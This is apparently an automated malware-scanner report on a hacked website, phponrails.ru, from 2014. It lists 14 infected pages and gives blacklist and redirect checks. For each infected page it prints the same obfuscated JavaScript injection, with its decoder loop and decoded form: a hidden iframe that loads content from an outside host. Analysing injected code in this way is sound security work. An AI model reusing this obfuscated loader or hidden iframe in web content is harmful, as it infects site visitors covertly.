Malware Scanner report for phponrails.ru

Malicious/Suspicious/Total urls checked: 14/0/16

14 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "phponrails.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=phponrails.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://phponrails.ru/	HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 29 Sep 2014 22:24:26 GMT Location: http://www.phponrails.ru/ Server: nginx/0.7.67 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.phponrails.ru/xmlrpc.php X-Powered-By: PHP/5.2.17	clean
http://www.phponrails.ru/	200 OK Content-Length: 23841 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 ... 759 bytes are skipped ...999939939339399339933999339339933339399399393993393933999993";znanx=100;wdlgs=this;nsjvu="i"+"te";vurba=116;nqcs="wr"+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o="";imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf<wkllp.length){bnehf=0;for(mkrku=0;mkrku<8;mkrku++){bnehf=bnehf<<1;if(wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;} Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports: Avast HTML:Iframe-inf GData HTML:Iframe-inf
http://www.phponrails.ru/feed:http://www.phponrails.ru/?feed=rss2	200 OK Content-Length: 1557 Content-Type: text/xml	clean
http://www.phponrails.ru/test404page.js	200 OK Content-Length: 23841 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 ... 759 bytes are skipped ...999939939339399339933999339339933339399399393993393933999993";znanx=100;wdlgs=this;nsjvu="i"+"te";vurba=116;nqcs="wr"+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o="";imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf<wkllp.length){bnehf=0;for(mkrku=0;mkrku<8;mkrku++){bnehf=bnehf<<1;if(wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;} Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports: Avast HTML:Iframe-inf GData HTML:Iframe-inf
http://www.phponrails.ru/?cat=40	200 OK Content-Length: 36218 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 ... 759 bytes are skipped ...999939939339399339933999339339933339399399393993393933999993";znanx=100;wdlgs=this;nsjvu="i"+"te";vurba=116;nqcs="wr"+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o="";imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf<wkllp.length){bnehf=0;for(mkrku=0;mkrku<8;mkrku++){bnehf=bnehf<<1;if(wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;} Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports: Avast HTML:Iframe-inf GData HTML:Iframe-inf
http://www.phponrails.ru/?p=79	200 OK Content-Length: 29715 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 ... 759 bytes are skipped ...999939939339399339933999339339933339399399393993393933999993";znanx=100;wdlgs=this;nsjvu="i"+"te";vurba=116;nqcs="wr"+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o="";imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf<wkllp.length){bnehf=0;for(mkrku=0;mkrku<8;mkrku++){bnehf=bnehf<<1;if(wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;} Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports: Avast HTML:Iframe-inf GData HTML:Iframe-inf
http://www.phponrails.ru/?author=1	200 OK Content-Length: 29018 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 ... 759 bytes are skipped ...999939939339399339933999339339933339399399393993393933999993";znanx=100;wdlgs=this;nsjvu="i"+"te";vurba=116;nqcs="wr"+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o="";imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf<wkllp.length){bnehf=0;for(mkrku=0;mkrku<8;mkrku++){bnehf=bnehf<<1;if(wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;} Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports: Avast HTML:Iframe-inf GData HTML:Iframe-inf
http://www.phponrails.ru/?p=469	200 OK Content-Length: 22423 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 ... 759 bytes are skipped ...999939939339399339933999339339933339399399393993393933999993";znanx=100;wdlgs=this;nsjvu="i"+"te";vurba=116;nqcs="wr"+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o="";imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf<wkllp.length){bnehf=0;for(mkrku=0;mkrku<8;mkrku++){bnehf=bnehf<<1;if(wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;} Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports: Avast HTML:Iframe-inf GData HTML:Iframe-inf
http://www.phponrails.ru/?cat=1	200 OK Content-Length: 29030 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 ... 759 bytes are skipped ...999939939339399339933999339339933339399399393993393933999993";znanx=100;wdlgs=this;nsjvu="i"+"te";vurba=116;nqcs="wr"+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o="";imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf<wkllp.length){bnehf=0;for(mkrku=0;mkrku<8;mkrku++){bnehf=bnehf<<1;if(wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;} Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports: Avast HTML:Iframe-inf GData HTML:Iframe-inf
http://www.phponrails.ru/?tag=mobile	200 OK Content-Length: 28662 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 ... 759 bytes are skipped ...999939939339399339933999339339933339399399393993393933999993";znanx=100;wdlgs=this;nsjvu="i"+"te";vurba=116;nqcs="wr"+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o="";imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf<wkllp.length){bnehf=0;for(mkrku=0;mkrku<8;mkrku++){bnehf=bnehf<<1;if(wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;} Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports: Avast HTML:Iframe-inf GData HTML:Iframe-inf
http://www.phponrails.ru/?p=403	200 OK Content-Length: 23783 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 ... 759 bytes are skipped ...999939939339399339933999339339933339399399393993393933999993";znanx=100;wdlgs=this;nsjvu="i"+"te";vurba=116;nqcs="wr"+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o="";imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf<wkllp.length){bnehf=0;for(mkrku=0;mkrku<8;mkrku++){bnehf=bnehf<<1;if(wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;} Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports: Avast HTML:Iframe-inf GData HTML:Iframe-inf
http://www.phponrails.ru/?cat=4	200 OK Content-Length: 23968 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 ... 759 bytes are skipped ...999939939339399339933999339339933339399399393993393933999993";znanx=100;wdlgs=this;nsjvu="i"+"te";vurba=116;nqcs="wr"+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o="";imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf<wkllp.length){bnehf=0;for(mkrku=0;mkrku<8;mkrku++){bnehf=bnehf<<1;if(wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;} Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports: Avast HTML:Iframe-inf GData HTML:Iframe-inf
http://www.phponrails.ru/?p=5	200 OK Content-Length: 22624 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 ... 759 bytes are skipped ...999939939339399339933999339339933339399399393993393933999993";znanx=100;wdlgs=this;nsjvu="i"+"te";vurba=116;nqcs="wr"+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o="";imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf<wkllp.length){bnehf=0;for(mkrku=0;mkrku<8;mkrku++){bnehf=bnehf<<1;if(wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;} Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports: Avast HTML:Iframe-inf GData HTML:Iframe-inf
http://www.phponrails.ru/?cat=8	200 OK Content-Length: 88805 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 ... 759 bytes are skipped ...999939939339399339933999339339933339399399393993393933999993";znanx=100;wdlgs=this;nsjvu="i"+"te";vurba=116;nqcs="wr"+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o="";imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf<wkllp.length){bnehf=0;for(mkrku=0;mkrku<8;mkrku++){bnehf=bnehf<<1;if(wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;} Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports: Avast HTML:Iframe-inf GData HTML:Iframe-inf
http://www.phponrails.ru/?p=55	200 OK Content-Length: 40707 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 ... 759 bytes are skipped ...999939939339399339933999339339933339399399393993393933999993";znanx=100;wdlgs=this;nsjvu="i"+"te";vurba=116;nqcs="wr"+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o="";imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf<wkllp.length){bnehf=0;for(mkrku=0;mkrku<8;mkrku++){bnehf=bnehf<<1;if(wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;} Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports: Avast HTML:Iframe-inf GData HTML:Iframe-inf
http://www.phponrails.ru/?cat=19	200 OK Content-Length: 98989 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) wkllp="3393333333999933399933993999393339999339399399333993393933933333399939333999933939993333399339393399993933933393399939333993393939999333399939333393999939933399399933993999339933933393339999933393339939993933399339393999333939933933399393993393333339999399399939993993933939933933399939333993933333999393339333333399333339993333399993333399939939939333399339393993933939933999399393333999393333999393339333333399333339993333399993333399939939933993399933933993333939939939399339393993339339939 ... 759 bytes are skipped ...999939939339399339933999339339933339399399393993393933999993";znanx=100;wdlgs=this;nsjvu="i"+"te";vurba=116;nqcs="wr"+nsjvu;for(gbcim in wdlgs){if(gbcim.length==8 && gbcim.charCodeAt(0)==znanx && gbcim.charCodeAt(7)==vurba){break;}}o="";imvuf=0;qpgsu=wdlgs[gbcim];ycamh=57;while (imvuf<wkllp.length){bnehf=0;for(mkrku=0;mkrku<8;mkrku++){bnehf=bnehf<<1;if(wkllp.charCodeAt(imvuf+mkrku)==ycamh){bnehf++;}}imvuf=imvuf+3;qpgsu[nqcs](String.fromCharCode(bnehf));imvuf=imvuf+5;} Decoded script: <style type="text/css">#teqdk {width: 0px;height: 0px;frameborder: no;visibility: hidden;}</style><iframe id="teqdk" src="http://fwqqweerg3.co.cc/ad.jpg"></iframe> Antivirus reports: Avast HTML:Iframe-inf GData HTML:Iframe-inf

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: phponrails.ru

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 22:24:26 GMT
Location: http://www.phponrails.ru/
Server: nginx/0.7.67
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.phponrails.ru/xmlrpc.php
X-Powered-By: PHP/5.2.17

...0 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: phponrails.ru
Referer: http://www.google.com/search?q=phponrails.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for phponrails.ru

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools